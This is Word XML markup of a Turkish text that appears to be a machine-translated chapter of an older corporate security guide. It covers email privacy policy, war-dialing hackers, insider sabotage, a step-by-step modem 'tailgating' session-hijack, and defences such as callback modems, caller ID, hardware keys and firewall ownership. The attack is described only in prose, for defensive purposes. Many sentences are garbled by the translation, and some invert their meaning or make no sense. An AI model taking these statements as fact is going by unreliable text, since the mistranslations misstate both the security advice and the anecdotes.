    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>E-posta için benzer korumalar var mı? Genel olarak, bir şirketin E-posta gizliliği konusundaki çalışan politikası, genellikle bir telekomünikasyon gizliliği belgesinde, standardı belirler. Ne yazık ki, birçok kuruluşun böyle bir belgesi yok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>Her zaman, makaledeki bir hikaye, e-postaların savunmasızlığının uzmanlar tarafından binlerce kelimeden dah</w:t>
      </w:r>
      <w:r>
        <w:t>a iyi olduğunu vurgulamaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Büyük bir çalışanın iki çalışanı arasında bir ofis romantizmi yaşanıyordu.  Şirket, günlük işlerin yürütülmesinde büyük ölçüde elektronik postaya bağlı kaldı ve çalışanların bu E-postanın güvenli olduğuna inanmak için her türlü nedeni vardı. Genç bayan, görünüşte talihine fotoğraflı bir grafik e-posta mektubu göndermenin romantik olacağını düşündü. Mesajı gönderirken “Tüm Kullanıcılar” düğmesini tıklamamış olsaydı bu iyi olurdu. Bunun iyi bir dedikodu için yapıldığını ve herkese E-posta sistemlerinin kullanımı hakkında net bir mesaj gönderdiğini söylemek yeterlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009A3CBB">
        <w:t>Bu tür insan hatalarına rağmen, E-posta sistemleri gerçekten güvenli mi? Bir işveren e-posta okuyabilir mi? Çalışanların mahremiyet hakkı var mı? Madde 5-04-41, faks iletimi gibi diğer iletişim biçimlerini tartıştı. Bir kişi başka birine yönelik bir faks veya e-posta alıp okuduğunda yasaları çiğniyor mu? Cevaplar sizi şaşırtabilir ve bu sistemler için güvenlik prosedürlerinin kapsamlı bir incelemesini isteyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Telekomünikasyon mahremiyetine ilişkin bir politika, sadece e-postaları değil, sesli postaları ve diğer ortamları kapsamalıdır. Politikalar genellikle yelpazenin aşağıdaki iki ucu arasında yer alır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t xml:space="preserve">Bir kez daha, bu politikaları yazarken hukuk danışmanına başvurmak akıllıca olacaktır. Seçeneklerin çeşitliliğini göstermek için bu örneklerde bilerek rahat davrandım, ancak aynı zamanda hukuk </w:t>
      </w:r>
      <w:r w:rsidRPr="009469B6">
        <w:lastRenderedPageBreak/>
        <w:t>danışmanına başvurulmaması risklere maruz kalan kuruluşları bırakabilir. Buna bir örnek, bir şirket sisteminden yasadışı bir bahisçilik operasyonu yürüten bir çalışandır. Kovuldu ama sonra işten çıkarıldı, çünkü şirketin işten çıkarmayı esas alacak mahremiyet politikası yoktu. Daha fazla bilgi için kurumsal hukuk departmanına, danışman dışına veya iç denetim bölümüne başvurmanız önemlidir. Gizlilik politikasının oluşturulmasına ek olarak, çevirmeli hatlar için koruyucu önlemlerin değerlendirilmesi, tehlikelerine genel bir bakışla başlamalıdır. Önerilen herhangi bir çözüm, asgari koruma seviyesini bile sağlayacaksa, aşağıdaki bölümlerde açıklanan izinsiz giriş türlerini ele almalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>BİLGİSAYAR KORSANLARI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bilgisayar korsanları, çoğu kez sistemi kırmaya çalışan, yetkisiz kullanıcılardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bunlar ölümcül olabilir veya olmayabilir, ancak bazı temel önlemler bu ihlalleri önleyebilir. Bu kişiler sıklıkla modem hatlarını bulmak için her numarayı önek olarak çeviren iblis çeviricileri kullandıkları için (örneğin, 555-0000, 555-0001, vb.), Özellikle numaralar ise, sayıları bulmak zor değildir.Bunlar şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Kullanıcıyı geri arayan modemler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Arayan tarafın CALLER Kimliğini görüntüleyen modemler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Başlangıçta sessizlikle cevap veren modemler veya donanımlar yerine bir modem tonu ile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• “Hoş Geldiniz” gibi bir başlangıç ekranını boyamayan ekipman yetkilendirilmemiş bir kullanıcıyı daha fazla teşvik etmek için hizmet verebilecek olan ABC Widget Şirketi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Başarısız oturum açma girişimlerini kaydeden ve izleyen ekipman.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Erişime izin vermek için özel bir donanım anahtarı gerektiren ekipman.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bu yöntemler yetkisiz erişime karşı neredeyse olanaksız bir savunma sağlayabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t>Sabotajcı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t>En rahatsız edici saldırı türleri, çevre hakkında bilgi sahibi olanlardan gelir. Mesela hoşnutsuz çalışanlar, diğerlerinden daha fazla hasara neden olabilir, çünkü en çok hangi saldırının en fazla zarar verebileceğini biliyorlar. Birçok kuruluş yüksek düzeyde çalışan güvenine sahiptir ve çalışanların yüksek derecede sisteme erişimine izin verme politikasına sahiptir. Bu övgüye değer, ancak özen gösterilmesi gerekiyor, çünkü en sıkı sıkıya bağlı firmalar bile bir çalışanın kişisel bir yakınlık nedeniyle kritik bir sistemi ne zaman tahrip edeceğinden asla emin olamıyor. Önerilen asgari önlemler şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Bir çalışanın giriş yapmasını engellemek için basit bir işlem şirketi terk eder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00283BC9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Herhangi bir çalışan sonlandırıldığında oturum açma erişimini engellemek için zorunlu bir süreç.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica-Compressed" w:hAnsi="Helvetica-Compressed" w:cs="Helvetica-Compressed"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica-Compressed" w:hAnsi="Helvetica-Compressed" w:cs="Helvetica-Compressed"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TAILGATING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t>Tailgating, bir sisteme erişmek için kullanılan eski bir çağrıdır. Bu böyle devam ediyor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>1. Bir süper kullanıcı veya sistem yöneticisi uzak bir sisteme arar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>2. Hacker numarayı çevirir (bir iblis çeviriciden elde edilir) ve yoğun bir sinyal alır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>3. Hacker 0'ı arar ve yerel telefon operatöründen hattı doğrulamasını ister.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>4. Operatör, genel olarak yetkilendirilmiş hattan düşen hattı keser. Süper kullanıcı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. Bu sırada bilgisayar korsanı aynı anda başka bir hatta arama yapıyor. Mükemmel bir şekilde zamanlanmışsa, modem taşıyıcı damlasını geçici bir çizgi vuruşu olarak görür ve korsanın modemiyle oturumu yeniden kurar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>6. Hacker süper kullanıcı erişimi ile çevrimiçi; sırayla süper kullanıcı çoğu zaman onun düşürüldüğünü bile bilmiyor. Sistemin sadece kilitlendiğini düşünüyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>7. Hızlı bir şekilde çalışan hacker, şifre dosyalarını alır ve süper kullanıcı bir şeyin yolunda gitmediğini fark etmeden önce, bir sonraki denemesi için sistemi tehlikeye atar. Güvenlik günlükleri kontrol edildiğinde, oturumu asla sonlandırılmadığı için yalnızca süper kullanıcı günlüğe kaydedilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Zekice zekice mi? Aslında, diğer bazılarına göre</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>hileler, bu ilkedir. Uygulanan ek güvenlik önlemlerinin kurumsal varlıklar için daha fazla iç huzur ve koruma sağladığının altını çizer. Unutmayın, güvenlik düzinelerce veya yüzlerce çalışanın kamuya açık telefon şebekesi üzerinden kritik sistemlere erişmesi büyük bir sorundur. Dikkatli planlama daha sonra büyük zorlukları önleyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t>ÖNLEYİCİ TEDBİRLER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t>Gelen Çağrı Muhasebe Sistemleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="009469B6">
        <w:t>Önerilen her bir çözüm, çevirmeli erişimin bir kağıt izi yapmak için yapılan tüm arama girişimlerinin bir muhasebe kaydını sağlamalıdır. Bu bilgilerin taranması, raporlanması ve sunumundaki güç, herhangi bir koruyucu sistemde ana seçim kriteri olmalıdır. Bir gece 350 başarısız oturum açma girişimi gösteren bir sistem açık bir sinyal gönderiyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00DB52C3">
        <w:t>Çağrı Sistemleri</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00DB52C3">
        <w:t>Yüksek düzeyde güvenlik gerektiren bazı sistemler otomatik çağrı bildirimi sağlar. Bir kullanıcı oturum açtığında, bir sistem yöneticisinin çağrı cihazı kapanır. Bunlar, başka türlü hesaba katılmayan gizemli giriş denemelerini bildirme prosedürleriyle birleştirilebilir. Sistem yöneticisine anında anormallik bildirildiği göz önüne alındığında çok pahalı değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00DB52C3">
        <w:t>Donanım Anahtarları</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00DB52C3">
        <w:t>Donanım anahtarları gibi donanım aygıtları, kritik görev sistemleri için tüm güvenlik önerilerine dahil edilmelidir. Paralel bir bağlantı noktasına takmak gibi kullanım kolaylığı ve düşük maliyet, bu cihazların kullanımında hem öncelikli kriterler olmalıdır. Anahtarlar, genellikle bir dizüstü bilgisayarın paralel bağlantı noktasına takılan bir donanım cihazıdır. Görevli yazılım ile birlikte oldukça kurşun geçirmez bir çözüm sunarlar çünkü bir davetsiz misafir sisteme daha da yaklaşmak için hem şifreleme yazılımına hem de donanım anahtarına sahip olmak zorunda kalır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00DB52C3">
        <w:t>Arayan kimliği</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Arayan kimliği birçok şehirde bulunur. Telefon teli merkezlerinde bile mümkün olduğu yerde, sınırlamalar vardır. Arayan Kimliği daha fazlası için kullanışlıdır. Sadece akşam yemeği sırasında can sıkıcı aramaların tanımlanmasından ibaret değil. Uygun şekilde kullanıldığında, yetkisiz kullanıcıları telefon numaralarıyla ve çoğu zaman adlarıyla tanımlayabilir. Daha da güzel olan arayan kimliği, birçok modem ve ISDN (tümleşik hizmetler dijital ağı) terminal adaptörleri için yerleşik bir özelliktir. Numaralar, daha önce açıklanan arama günlüğünün bir parçası olarak arama bazında kaydedilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:lastRenderedPageBreak/>
        <w:t>Arayan kimliği servisinin pek çok alanda kullanılamaması nedeniyle, bu hizmeti koruyucu sistemin tek temeli olarak kullanan modemler veya diğer donanımlar dikkate alınmayabilir. Arayan kimliği mevcut olsa bile, güvenlik kaygıları var, yani:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Arayan numara verileri her zaman değişmeli aktarıcılar tarafından aktarılmayabilir. AT&amp;T, MCI ve Sprint gibi. Şirketiniz bir anlamda, bunu geçmeyen taşıyıcıları kullanan uzun mesafe arayanlara karşı savunmasız olacaktır. (Bu, taşıyıcılar mümkün olduğunca arayan kimliği verilerini aktarmak için FCC düzenlemelerine uydukları için hızla değişmektedir.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Değişim taşıyıcıları bu verileri iletecek şekilde donatılmış olsalar bile, uzak yerel merkez ofisi olmayabilir. Bir şirket, başka yöntemler kullanılmadığı sürece hala izinsiz kullanıma açık olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>• Ülkenin bazı bölgelerinde bulunan yerel merkez ofisleri, yerel ya da şehirlerarası aramalar için arayan kimliği değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Geri arama modemleri</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Günümüzde piyasada pek çok geri arama modem bulunmaktadır. Bu cihazlar kullanıcıların oturum açmasını ve ardından gelen arayanı önceden belirlenmiş bir numaradan kapatıp tekrar aramalarını gerektirir. Bunlar oldukça kusursuz, ancak uygunsuz. Bir oteldeki göçebe bir kullanıcının yetkili bir numarası olmayacak ve bir geri arama modem bankasını arayamayacak. Bununla birlikte, potansiyel davetsiz misafirlere özel vurgu ve tarama yaparak bu amaç için özel modem bankaları ve sayıları belirlenebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Ana Bilgisayarı Sabitleme</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Pek çok kullanıcı, çevirmeli ağ için güvenlik seçeneklerinin en iyi ihtimalle marjinal olduğu eski anabilgisayar ortamlarını korumaya çalışırken sıkıştı. IBM, ana bilgisayar için zarif ve basit bir çözüme sahip olmamakla birlikte, protokol dönüştürücüyü bir çevirmeli sunucu ile sonlandırarak ek bir güvenlik düzeyi sağlayabilir. IBM 8235 çevirmeli sunucu, bir adaydır. Gerekli muhasebe, geri arama yeteneği sağlar ve maksimum sekiz port kapasitesiyle gelecekteki herhangi bir büyüme için doğru boyutlandırılmış görünmektedir. Ancak, biraz pahalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Yazılım Tabanlı Çözümler</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Çevirmeli kullanıcılar için şeffaflık bir sorun olduğu için (farklı bölümler çevirirken genellikle çeşitli yazılım paketleri kullanırlar), çevirmeli yazılım emülasyon paketlerinin toptan değişimini düşünmek istemeyebilirsiniz. Bu, mevcut işletim ortamınız için zararlı olabilir. Mevcut donanım paketini güçlendiren veya geliştiren yazılım alternatifleri en çok tercih edilir, çünkü yeni paketler hakkında eğitim ihtiyacı asgari düzeydedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bunları veya başka bir ürünü değerlendirirken, aşağıdakileri arayın;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Özellikler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>1. Ünite güvenlik cihazı ve modem yöneticisi olarak görev yapmalıdır. Arama yaparken, art arda “cevap yok” diye isabet eden herkes modem havuzu bu özelliği takdir edebilir. Sistemin yapabildiğinden emin olun bu satırları otomatik olarak meşgul et, sonra sizi problemle ilgili uyar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>2. Ünite, modem tarafından cevap süresi bilgisi sağlamalıdır. Telefon hattı ve limana göre. Örneğin, kişisel bir arayüze arayüz gerekir. Etkili performans yönetimi için bilgisayar. Bu, kullanıcılar bağlantı kurmayı bildirmek için aradıklarında bir yardım masasına iyi bir bilgi kaynağı sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Ürün etkili bir yükseltilebilirlik sunmalıdır. Ek güvenlik için, ürünün, kullanıcının paralel bağlantı noktasına arayüz sağlayan token donanım aygıtları sunması gerekir. Yazılım belirteci de mevcut olmalıdır. DOS veya Windows yazılımının her ikisi de desteklenmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>4. Yazılım ve donanım anahtarları. Kullanıcılar için ekipman şeffaflığı genellikle bir sorun olduğu için, uzak kullanıcılar tarafından kullanılan donanımdaki büyük değişiklikleri göz önünde bulundurmamaya çalışın. Bu durum için çok rahatsız edici olabilir. Mevcut çalışma ortamı. Bu bakım ve eğitimde daha sonraya mal olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>İNTERNET GÜVENLİĞİ SORUMLULUKLARI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>İzinsiz veri erişim tartışması, İnternet'ten bahsetmeden tamamlanmaz. İnternet, çoğu şirket için, en azından gelir getirici bir sistem olarak nispeten yeni bir fenomendir ve birçok şirket, güvenlik sorumluluklarıyla ilgili çözülmemiş organizasyon sorunlarına sahiptir. İnternet erişimi için kullanılan ekipmanı kim korur? Tarihsel olarak, bu tür işlemler genellikle Orta Kademe bilgisayar hizmetleri gibi İD departmanında özel bir ünitenin altına düşmüştür. Ancak, bugün birçok şirket İnternet güvenlik duvarının ve diğer bileşenlerin fiili olarak işletilmesinden sorumlu ayrı bir teknoloji grubuna sahiptir. İnternet güvenliğinden sorumlu her zaman net bir iş birimi yoktur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Kimin hangi sistemden ve hangi şartlar altında kimin sorumlu olduğunu belirten net bir politika bulunmamasından dolayı sistemde geçici olarak açık bırakılmalıdır. Bu sorumluluk nihayetinde bir BT güvenlik grubuna (bugünkü LAN ve anabilgisayar hizmetleri gibi) çekecek olsa da, teknoloji “tweaking and tinkering” aşamasındayken, güvenlik açıkları derhal devam edecek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Başka bir konu personel ve kaynak tahsisidir. Birçok şirket, çok küçük bir uzman havuzu oluşturmamak ve daha iyi bir derinlik sağlam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ak için insan gücündeki nominal </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44AB5">
        <w:t>bir artışı düşünmelidir. İnternet erişimi sağlandığı ve olası güvenlik kuşakları veya boşlukları kapatıldığı zaman, organizasyon değişiklikleri okunabilir. Bir şirketin kolayca Internet gurusu olarak tanımlanan bir kişisi varsa, not alın. Bu millet çok rağbet görüyor ve başka iş kabul ettikleri takdirde çantayı tutmanıza izin verebilir. Ayrıca, asılsız ve az çalışan personelin güvenlik ihlallerini araştırmak için çok az zamanları vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Test Güvenlik Duvarı Kurulumu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Çoğu şirket, test ve yedekleme için özel olarak ayrılmış güvenlik duvarı platformuna sahip değildir. Tüm amaç ve amaçlar için, mevcut teknoloji hemen hemen her şekilde tek dişlidir. Bu henüz büyük bir endişe değil, güvenlik duvarı tam olarak çalışmaya başladığında ve sistem gelir getirdiğinde olur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B44AB5">
        <w:t>Ana karelerde ve yerel alan ağlarında olduğu gibi, üretim uygulamalarına doğrudan yeni uygulamalar getirmeyen bir protokol ve prosedür oluşturmak önemlidir. Bu ders 25 yıllık anabilgisayar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44AB5">
        <w:t>operasyonları sırasında ortaya çıktı ve hatta en yenilen yerel ağ yöneticileri bile ihtiyatlı bir operasyon müjdesi olarak benimsemeyi öğrendi. Pek çok yeni teknoloji gibi, bu protokoller henüz pek çok firma için İnternet alanında yetişmedi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Yine sistem tamamen gelir getirici hale geldiğinde. İnternet birçok firma için nispeten yeni bir teknoloji olduğundan, personelin uğraşmaya teşvik edilmesi gerekir. Bir üretim platformunda deneme yapmak akıllıca olmasa da, yedek güvenlik duvarı yapılandırması pratik bir seçenek sağlayabilir. Yedekleme, personeli işletmeyi işletmeyi tehlikeye atmadan denemeye, iyileştirmeye ve iyileştirmeye teşvik ederek daha da haklı çıkarılabilir. Özet olarak, bir yedek güvenlik duvarı özelliğinin ekstra maliyeti, ağın sağladığı esneklik için haklı gösterilebilir ve çünkü temel teknolojistler yeni süreçleri denemeye teşvik edildiğinde eğitim eğrisini kısaltır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:lastRenderedPageBreak/>
        <w:t>Yedek T1'ler</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
        <w:t>Dikkate alınması gereken bir diğer husus, çoğu büyük kullanıcının, bir güvenlik açığı oluşturan İnternet Servis Sağlayıcıya (ISS) yalnızca bir T1 yüklemesidir. Daha akıllıca bir yaklaşım, ISS'ye geniş alan ağı bağlantısında daha fazla esneklik için “Round Robin DNS” ile birlikte ikinci bir T1 eklemeyi düşünmektir. Birçok yerel telefon şirketi de T1 erişimini çeşitlendirmek için tasarlanmış hizmetler sunmaktadır. Güneybatı Bell bölgesinde, hizmete oldukça farklı bir oranda tamamen farklı bir T1 devresi sunan SecureNet ™ adı verilir. CSU'lar ve DSU'lar gibi diğer bileşenler, artıklık olmadan tek dişlidir. Arızalı bileşenlerin hızlı bir şekilde değiştirilebilmelerini sağlamak ve işletmeler üzerindeki etkiyi en aza indirgemek için satıcılarla yedek parça tutulması veya depo düzenlemeleri yapılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>İnternet, bir şirketin faaliyetlerinin ayrılmaz bir parçası haline geldikçe (gelir veya diğer geçerli ölçümler üzerindeki etkilerle tanımlandığı gibi), sabit diskler de dahil olmak üzere yedek parçaların depolanması, yedek denetleyici kartları, yedek teyp sürücüleri ve güç kaynakları dikkate alınmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="000369D5">
